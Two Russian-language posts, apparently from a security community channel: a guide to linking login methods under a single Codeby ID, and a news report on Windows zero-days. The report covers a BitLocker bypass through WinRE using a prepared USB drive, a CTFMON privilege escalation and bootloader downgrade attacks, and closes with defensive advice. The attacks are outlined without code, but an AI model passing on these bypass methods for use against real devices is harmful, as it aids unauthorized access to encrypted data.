🔐 Единая система входа Codeby ID — как пользоваться Codeby ID — это один аккаунт для входа на форум codeby.net и на платформу hackerlab.pro. К одному Codeby ID можно привязать несколько способов входа: email, Google, GitHub, Telegram. Куда бы вы ни заходили — это будет ваш один и тот же аккаунт. --- ❓ Сценарий 1 — у меня только Telegram и аккаунт на HackerLab Цель: добавить email и получить доступ к форуму с тем же аккаунтом. 1. Зайдите на hackerlab.pro через кнопку «Войти через Telegram» (как раньше) 2. Откройте свой Профиль → Настройки 3. Нажмите кнопку «Привязать email» (или подобную в блоке «Способы входа») 4. Откроется страница Codeby ID — введите свой реальный email и нажмите «Сохранить» 5. На указанный email придёт письмо с подтверждением — перейдите по ссылке внутри письма 6. Готово ✅ — теперь у вас два способа входа (Telegram + email) После этого вы автоматически сможете зайти на форум codeby.net через Codeby ID — система создаст для вас аккаунт или найдёт существующий по email. --- ❓ Сценарий 2 — у меня только email/Google/GitHub и аккаунт на форуме Цель: привязать Telegram и зайти на HackerLab в свой существующий аккаунт. 1. Зайдите на codeby.net через ваш обычный способ (email/Google/GitHub) 2. Откройте «Безопасность аккаунта» — https://codeby.net/account/security 3. Нажмите кнопку в блоке «🔐 Управление способами входа» 4. Откроется страница Codeby ID — раздел «Способы входа» 5. Нажмите «Привязать Telegram» — откроется виджет Telegram, подтвердите вход в Telegram 6. Готово ✅ — теперь Telegram привязан к вашему Codeby ID Теперь зайдите на hackerlab.pro через «Войти через Telegram» — попадёте в свой существующий HackerLab-аккаунт со всем прогрессом (если у вас уже был аккаунт на HL под этим Telegram). --- ❓ Сценарий 3 — связать существующие аккаунты Форум + HackerLab Связь происходит автоматически, если все способы входа привязаны к одному Codeby ID. Проверка: зайдите на https://id.codeby.net/if/user/ → раздел «Способы входа» — здесь должны быть все ваши способы (Telegram, email, Google, GitHub — те что используете). Если способа не хватает — привяжите по инструкциям из Сценария 1 или 2. После того как все способы привязаны: - Логин на форум по email/Google/GitHub → ваш форумный аккаунт - Логин на HL по Telegram → ваш HL-аккаунт со всеми задачами - Это один и тот же Codeby ID на обоих сайтах --- ⚠️ Чего НЕ нужно делать - ❌ Не регистрируйтесь через разные email на разных сайтах — система воспримет это как разных людей - ❌ Не используйте одноразовые email (mailinator, cock.lu и подобные) — они блокируются как спам, письмо подтверждения не дойдёт - ❌ Если что-то пошло не так — не создавайте новый аккаунт повторно, напишите CTO (контакт ниже). Лишние аккаунты только усложнят восстановление --- 🆘 Куда писать о проблеме Если: - Видите пустой аккаунт вместо своего старого (нет ваших задач CTF / нет постов на форуме) - Не получается привязать email или Telegram - Письмо с подтверждением не приходит - Кнопка «Войти через X» не работает или показывает ошибку - Любая другая проблема со входом Напишите мне в Telegram: [@The_Codeby] или на mail@codeby.email — приложите скриншот и опишите что делали и что увидели. Чем подробнее — тем быстрее починим.

🟦 Windows под прицелом: серия новых Zero-Day ставит под удар BitLocker и ядро системы Исследователь-одиночка, скрывающийся под никами Chaotic Eclipse и Nightmare-Eclipse, продолжает свою «войну» против Microsoft. После недавнего слива трех уязвимостей в Defender, он опубликовал еще два критических бага, затрагивающих Windows 11 и серверные версии 2022/2025. В ИБ-сообществе эти находки уже получили кодовые имена YellowKey и GreenPlasma. Ситуация накаляется: исследователь прямо заявляет, что это месть за игнорирование его отчетов со стороны MSRC (Microsoft Security Response Center), и обещает «большой сюрприз» к июньскому Patch Tuesday 2026 года. Вот основные технические подробности, которые известны: ➡️ YellowKey: BitLocker больше не замок. Уязвимость позволяет обойти шифрование BitLocker через среду восстановления (WinRE). Исследователь называет это «настоящим бэкдором». Для реализации атаки достаточно вставить специально подготовленную USB-флешку с файлами «FsTx» и зажать клавишу CTRL при загрузке в WinRE. ▶️Главная проблема: Даже связка TPM+PIN не защищает от этого метода. ▶️Мнение экспертов: Известный исследователь Уилл Дорманн подтвердил воспроизводимость бага, отметив, что транзакционные файлы NTFS на внешнем диске могут манипулировать системными файлами на зашифрованном диске X:, вызывая командную строку с полным доступом. ➡️ GreenPlasma: Privilege Escalation через CTFMON. Вторая уязвимость связана с компонентом Windows Collaborative Translation Framework. Она позволяет обычному пользователю создавать объекты в памяти в директориях, доступных только для системы (SYSTEM). Хотя опубликованный PoC пока не дает «чистый» SYSTEM-shell, он открывает двери для манипуляции привилегированными сервисами и драйверами. ➡️ Атаки отката (Downgrade Attacks). Параллельно эксперты из Intrinsec продемонстрировали, что BitLocker на полностью обновленных Windows 11 можно взломать менее чем за 5 минут. Атака использует старый загрузчик (CVE-2025-48804), который хоть и имеет патч, но все еще подписан доверенным сертификатом Microsoft (PCA 2011). Secure Boot пропускает его, так как проверяет подпись, а не версию файла. 🛡Что важно для защиты инфраструктуры прямо сейчас: 👉 Пересмотр доверия к WinRE. Пока Microsoft не выпустила официальный патч, среда восстановления остается «входной дверью» для злоумышленника с физическим доступом. 👉 Миграция сертификатов. Необходимо принудительно переводить менеджер загрузки на сертификаты CA 2023 и отзывать старые PCA 2011, чтобы предотвратить атаки типа Downgrade. 👉 Мониторинг физического периметра. Все описанные методы обхода BitLocker требуют физического доступа к устройству или возможности подключения USB-носителя на этапе загрузки. Microsoft пока ограничивается стандартными заявлениями о «приверженности безопасности клиентов», однако молчаливое исправление предыдущих багов (как в случае с RedSun) подтверждает — проблема носит массовый характер. 🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером